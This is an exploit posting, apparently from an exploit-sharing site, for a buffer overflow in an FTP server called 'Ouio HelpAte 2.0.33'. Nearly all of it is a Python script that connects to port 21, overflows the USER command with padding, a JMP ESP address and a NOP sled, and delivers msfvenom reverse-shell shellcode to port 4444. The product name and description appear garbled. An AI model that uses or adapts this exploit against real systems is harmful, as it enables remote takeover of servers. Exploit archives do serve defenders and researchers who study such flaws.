Ouio HelpAte 2.0.33 Buffer Owerflow

2019.12.04
tr Gaddar (TR) tr
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Author : Gaddar ~ Turkish Vulnerability Researcher Exploit Title : Ouio HelpAte 2.0.33 Buffer Owerflow Team : Yer6Sec.ORG Exploit Description : The buffer buffer owerflow detected for Ouio HelpAte is a vulnerability. Tested ON : Immunity Debugger 1.85 [#] #!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],21)) buff="C"*4001 buff+="\x53\x93\x42\x7e" #JMP ESP buff+="\x90"*40 #msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00\x0a\x0d' -f py buff += "\xba\x44\xd8\x61\xbe\xd9\xc4\xd9\x74\x24\xf4\x5e\x2b" buff += "\xc9\xb1\x52\x31\x56\x12\x03\x56\x12\x83\xaa\x24\x83" buff += "\x4b\xce\x3d\xc6\xb4\x2e\xbe\xa7\x3d\xcb\x8f\xe7\x5a" buff += "\x98\xa0\xd7\x29\xcc\x4c\x93\x7c\xe4\xc7\xd1\xa8\x0b" buff += "\x6f\x5f\x8f\x22\x70\xcc\xf3\x25\xf2\x0f\x20\x85\xcb" buff += "\xdf\x35\xc4\x0c\x3d\xb7\x94\xc5\x49\x6a\x08\x61\x07" buff += "\xb7\xa3\x39\x89\xbf\x50\x89\xa8\xee\xc7\x81\xf2\x30" buff += "\xe6\x46\x8f\x78\xf0\x8b\xaa\x33\x8b\x78\x40\xc2\x5d" buff += "\xb1\xa9\x69\xa0\x7d\x58\x73\xe5\xba\x83\x06\x1f\xb9" buff += "\x3e\x11\xe4\xc3\xe4\x94\xfe\x64\x6e\x0e\xda\x95\xa3" buff += "\xc9\xa9\x9a\x08\x9d\xf5\xbe\x8f\x72\x8e\xbb\x04\x75" buff += "\x40\x4a\x5e\x52\x44\x16\x04\xfb\xdd\xf2\xeb\x04\x3d" buff += "\x5d\x53\xa1\x36\x70\x80\xd8\x15\x1d\x65\xd1\xa5\xdd" buff += "\xe1\x62\xd6\xef\xae\xd8\x70\x5c\x26\xc7\x87\xa3\x1d" buff += "\xbf\x17\x5a\x9e\xc0\x3e\x99\xca\x90\x28\x08\x73\x7b" buff += "\xa8\xb5\xa6\x2c\xf8\x19\x19\x8d\xa8\xd9\xc9\x65\xa2" buff += "\xd5\x36\x95\xcd\x3f\x5f\x3c\x34\xa8\xcc\xd1\xbe\xa9" buff += "\x65\xd0\xbe\xb8\x29\x5d\x58\xd0\xc1\x0b\xf3\x4d\x7b" buff += "\x16\x8f\xec\x84\x8c\xea\x2f\x0e\x23\x0b\xe1\xe7\x4e" buff += "\x1f\x96\x07\x05\x7d\x31\x17\xb3\xe9\xdd\x8a\x58\xe9" buff += "\xa8\xb6\xf6\xbe\xfd\x09\x0f\x2a\x10\x33\xb9\x48\xe9" buff += "\xa5\x82\xc8\x36\x16\x0c\xd1\xbb\x22\x2a\xc1\x05\xaa" buff += "\x76\xb5\xd9\xfd\x20\x63\x9c\x57\x83\xdd\x76\x0b\x4d" buff += "\x89\x0f\x67\x4e\xcf\x0f\xa2\x38\x2f\xa1\x1b\x7d\x50" buff += "\x0e\xcc\x89\x29\x72\x6c\x75\xe0\x36\x9c\x3c\xa8\x1f" buff += "\x35\x99\x39\x22\x58\x1a\x94\x61\x65\x99\x1c\x1a\x92" buff += "\x81\x55\x1f\xde\x05\x86\x6d\x4f\xe0\xa8\xc2\x70\x21" s.recv(1024) s.send('USER'+ buff + '\r\n') s.close()


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top